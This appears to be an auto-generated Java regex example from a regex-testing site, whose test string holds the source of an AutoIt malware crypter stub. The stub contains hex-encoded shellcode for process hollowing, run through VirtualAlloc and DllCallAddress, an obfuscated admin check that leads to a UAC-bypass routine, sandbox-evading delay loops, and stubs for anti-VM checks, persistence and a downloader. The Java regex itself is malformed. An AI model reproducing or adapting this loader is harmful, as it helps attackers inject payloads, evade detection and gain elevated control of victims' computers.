import java.util.regex.Matcher;
import java.util.regex.Pattern;
public class Example {
public static void main(String[] args) {
final String regex = "$[a-zA-Z0-9_]+";
final String string = "Execute(\"Opt(\"\"TrayIconHide\"\", 1)\")\n"
+ ";~ Call(\"CustomAntiVM\")\n"
+ ";~ Call(\"CustomAntiSandbox\")\n"
+ ";~ Call(\"CustomDelay\")\n"
+ ";~ Call(\"CustomStartup\")\n"
+ ";~ Call(\"CustomDownloader\")\n"
+ ";~ Call(\"CustomUACBypass\")\n"
+ "Global $ProcessId\n"
+ "Global $XWNFIUYHFDUH = Execute('%INJECTION%')\n"
+ "Call(\"Hollowing\",$XWNFIUYHFDUH, \"\", GetResources())\n"
+ ";~ Call(\"CustomMeltFile\")\n"
+ ";~ Call(\"CustomPersistence\")\n"
+ "Func Hollowing($wPath, $wArguments, $lpFile)\n"
+ "Local $ojnkoeyrcwxlutoux = \"0x558BEC8B4D088BC180390074064080380075FA2BC15DC20400558BEC56578B7D0833F657E8D7FFFFFF8B\"\n"
+ "Local $kxghsiqvahwxnq = $ojnkoeyrcwxlutoux & \"C885C974200FBE07C1E60403F08BC625000000F0740BC1E81833F081E6FFFFFF0F474975E05F8BC65E5D\"\n"
+ "Local $sdqpidmqtyxkecrfsp = $kxghsiqvahwxnq & \"C20400558BEC51515356578B7D0833F68B473C8B44387803C78B50208B581C03D78B482403DF8B401803\"\n"
+ "Local $wtzfkbwb = $sdqpidmqtyxkecrfsp & \"CF8955FC894DF889450885C074198B04B203C750E882FFFFFF3B450C74148B55FC463B750872E733C05F\"\n"
+ "Local $xonwcuofeidefqludikidnevpgau = $wtzfkbwb & \"5E5B8BE55DC208008B45F80FB704708B048303C7EBE9558BEC81ECF003000053565733FF897DB8648B35\"\n"
+ "Local $qntpthgycxwcvzxicnjfif = $xonwcuofeidefqludikidnevpgau & \"300000008B760C8B760C8B368B368B76188975B8897DC8648B35300000008B760C8B760C8B368B761889\"\n"
+ "Local $bbrnxjj = $qntpthgycxwcvzxicnjfif & \"75C88D45B4C78558FFFFFF793A3C07898520FFFFFF8BF78D45E8C7855CFFFFFF794A8A0B898524FFFFFF\"\n"
+ "Local $shvtuoronlyjnrglhmeqvsbwvl = $bbrnxjj & \"8D45B0898528FFFFFF8D45A489852CFFFFFF8D45C0898530FFFFFF8D4598898534FFFFFF8D45D4898538\"\n"
+ "Local $llryfjxokqaibkgtpblwvnuqjat = $shvtuoronlyjnrglhmeqvsbwvl & \"FFFFFF8D45A889853CFFFFFF8D45A0898540FFFFFF8D4590898544FFFFFF8D4594898548FFFFFF8D45C4\"\n"
+ "Local $tnzfzyidgxogpmyh = $llryfjxokqaibkgtpblwvnuqjat & \"89854CFFFFFF8D45AC898550FFFFFF8D45CCC78560FFFFFFEE38830CC78564FFFFFF5764E101C78568FF\"\n"
+ "Local $qlzltjbdzlyqxqbpfpdakkbj = $tnzfzyidgxogpmyh & \"FFFF18E4CA08C7856CFFFFFFE3CAD803C78570FFFFFF99B04806C78574FFFFFF93BA9403C78578FFFFFF\"\n"
+ "Local $shawavvjwgeejpajlvgozrfp = $qlzltjbdzlyqxqbpfpdakkbj & \"E4C7B904C7857CFFFFFFE487B804C74580A92DD701C7458405D13D0BC745884427230FC7458CE86F180D\"\n"
+ "Local $wzbzixxgjpsmjfddpp = $shawavvjwgeejpajlvgozrfp & \"898554FFFFFF8B45C883FE02FFB4B558FFFFFF0F4F45B850E842FEFFFF8B8CB520FFFFFF890185C00F84\"\n"
+ "Local $urmwfppupodnjbbkzbuvayjx = $wzbzixxgjpsmjfddpp & \"910300004683FE0E7CD28BDF6A108D45D84350895DFCFF55E86A448D85DCFEFFFF50FF55E868CC020000\"\n"
+ "Local $utwnzgscykxocatlkoiicwgrlzg = $urmwfppupodnjbbkzbuvayjx & \"8D8510FCFFFF50FF55E88B4D10C78510FCFFFF070001008B713C03F10FB74614897DF8897DBC8945D039\"\n"
+ "Local $bjtoviobltcuiva = $utwnzgscykxocatlkoiicwgrlzg & \"BEA0000000741139BEA40000007409F6461601750333FF4733D2897DF433C08955EC6639110F94C03D4D\"\n"
+ "Local $ozemhyijlmqavynfcazqtevbgoz = $bjtoviobltcuiva & \"5A00000F840E03000033C039160F94C03D504500000F84FC02000033C0663956040F94C03D4C0100000F\"\n"
+ "Local $hritzmbigny = $ozemhyijlmqavynfcazqtevbgoz & \"84E80200008D45D8508D85DCFEFFFF5052526A04525252FF750CFF7508FF55A485C00F84AD0200008D85\"\n"
+ "Local $ritzicfhsdx = $hritzmbigny & \"10FCFFFF50FF75DCFF55A085C00F84980200006A006A048D45BC508B85B4FCFFFF83C00850FF75D8FF55\"\n"
+ "Local $ozujehkdcgtyardsqotqhsd = $ritzicfhsdx & \"9485C00F84780200008B45BC3B4634750F50FF75D8FF55B085C00F85610200006A406800300000FF7650\"\n"
+ "Local $irxtwsvzvwjd = $ozujehkdcgtyardsqotqhsd & \"6A00FF55988BD885DB0F84450200006A406800300000FF7650FF7634FF75D8FF55C08945F885C0753B85\"\n"
+ "Local $izqhuxcksyjsifkptzmq = $irxtwsvzvwjd & \"FF0F84230200006A406800300000FF765033FFC745EC0100000057FF75D8FF55C08945F885C075146800\"\n"
+ "Local $wvlrhnnkhhxcrnutzgzsehlki = $izqhuxcksyjsifkptzmq & \"8000005753FF55C48B5DFCE9F501000033FFFF7654FF751053FF55B433C0897DF0663B4606732C8B7DD0\"\n"
+ "Local $elrig = $wvlrhnnkhhxcrnutzgzsehlki & \"83C72C03FEFF77FC8B07034510508B47F803C350FF55B48B4DF08D7F280FB7460641894DF03BC87CDC8B\"\n"
+ "Local $fwjshmnzzhkr = $elrig & \"7B3C8B45F803FB837DEC008947340F848A000000837DF4000F84800000008B97A00000008365F40003D3\"\n"
+ "Local $dlbgbukrqnzulokbidbwcbbbsy = $fwjshmnzzhkr & \"83BFA400000000766B8B420433C983E808894DF0A9FEFFFFFF76450FB7444A086685C0742B25FF0F0000\"\n"
+ "Local $ghfzgrimeajcdqgrpswogsclqwf = $dlbgbukrqnzulokbidbwcbbbsy & \"03028945EC8BC88B46342904198B4DF08B47340FB74C4A0881E1FF0F0000030A0104198B4DF08B420441\"\n"
+ "Local $npcjancoclqgimzkks = $ghfzgrimeajcdqgrpswogsclqwf & \"83E808894DF0D1E83BC872BB8B4DF4034A04035204894DF43B8FA4000000729533FF57FF765053FF75F8\"\n"
+ "Local $galpkljedrneujjluxcqj = $npcjancoclqgimzkks & \"FF75D8FF55D485C00F84FEFEFFFF8D459C506A02FF7654FF75F8FF75D8FF55CC85C00F84E4FEFFFF33C0\"\n"
+ "Local $oabegzlochissjwuxeqavj = $galpkljedrneujjluxcqj & \"897DF4663B4606736C8B7DD083C73C03FE8B07A900000020741985C079046A40EB172500000040F7D81B\"\n"
+ "Local $kbxqhwwr = $oabegzlochissjwuxeqavj & \"C083E01083C010EB1585C079056A0458EB0CA9000000406A00580F95C0408D4D9C5150FF77E48B47E803\"\n"
+ "Local $bitjszjlemxpbjembznrx = $kbxqhwwr & \"45F850FF75D8FF55CC85C074128B4DF483C7280FB7460641894DF43BC8729E33FF68008000005753FF55\"\n"
+ "Local $slpnfpagpsoslgayirw = $bitjszjlemxpbjembznrx & \"C485C00F845BFEFFFF576A048D45F8508B85B4FCFFFF83C00850FF75D8FF55D485C00F843CFEFFFF8B46\"\n"
+ "Local $klzedfibwlphj = $slpnfpagpsoslgayirw & \"280345F88985C0FCFFFF8D8510FCFFFF50FF75DCFF559085C00F841BFEFFFFFF75DCFF55AC85C00F840D\"\n"
+ "Local $etixewnk = $klzedfibwlphj & \"FEFFFF8B45E0EB1D8B5DFC33FF837DD800740757FF75D8FF55A883FB050F8677FCFFFF33C05F5E5B8BE5\"\n"
+ "Local $N1 = $etixewnk & \"5DC20C00\"\n"
+ "Local $lpShellcode = DllCall(\"kernel32\", \"ptr\", \"VirtualAlloc\", \"dword\", 0, \"dword\", BinaryLen($N1), \"dword\", 0x3000, \"dword\", 0x40)[0]\n"
+ "Local $File_Struct = DllStructCreate(\"byte lpfile[\" & StringLen($lpFile) & \"]\")\n"
+ "BitAND(DllStructSetData(DllStructCreate(\"byte shellcode[\" & BinaryLen($N1) & \"]\", $lpShellcode), \"shellcode\", $N1),DllStructSetData($File_Struct, \"lpfile\", $lpFile))\n"
+ "$ProcessId = DllCallAddress(\"dword\", $lpShellcode + \"0xBE\", \"wstr\", $wPath, \"wstr\", $wArguments, \"ptr\", DllStructGetPtr($File_Struct))[0]\n"
+ "EndFunc\n"
+ ";~ %OPT%\n\n\n"
+ "Func CustomUACBypass()\n"
+ "Local $ejifuhzuieh = Execute(BinaryToString(\"0x497341646d696e2829\"))\n"
+ "Local $QSZUIEHZ = \"WIN_10\"\n"
+ "Local $ONUHBFE = \"WIN_7\"\n"
+ "If Not $ejifuhzuieh Then\n"
+ " Local $QSDJSI = @OSVersion\n"
+ " If $QSDJSI == $QSZUIEHZ Then\n"
+ " CustomWin10Elevation()\n"
+ " ElseIf $QSDJSI == $ONUHBFE Then\n"
+ " CustomWin7Elevation()\n"
+ " EndIf\n"
+ "EndIf\n"
+ "EndFunc\n\n"
+ "Func CDEL($SLTIME,$SLEOO)\n"
+ "For $i = 0 To $SLEOO\n"
+ " DllCall(\"kernel32.dll\", \"none\", \"Sleep\", \"dword\", $SLTIME/ $SLEOO)\n"
+ " $avar = 999\n"
+ " While $avar == 999\n"
+ " $avar = $avar + 1 * $avar - 1 ^ 405 + $avar * $avar\n"
+ " $avar = 11200\n"
+ " WEnd\n"
+ "Next\n"
+ "EndFunc";
final Pattern pattern = Pattern.compile(regex, Pattern.MULTILINE);
final Matcher matcher = pattern.matcher(string);
while (matcher.find()) {
System.out.println("Full match: " + matcher.group(0));
for (int i = 1; i <= matcher.groupCount(); i++) {
System.out.println("Group " + i + ": " + matcher.group(i));
}
}
}
}
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for Java, please visit: https://docs.oracle.com/javase/7/docs/api/java/util/regex/Pattern.html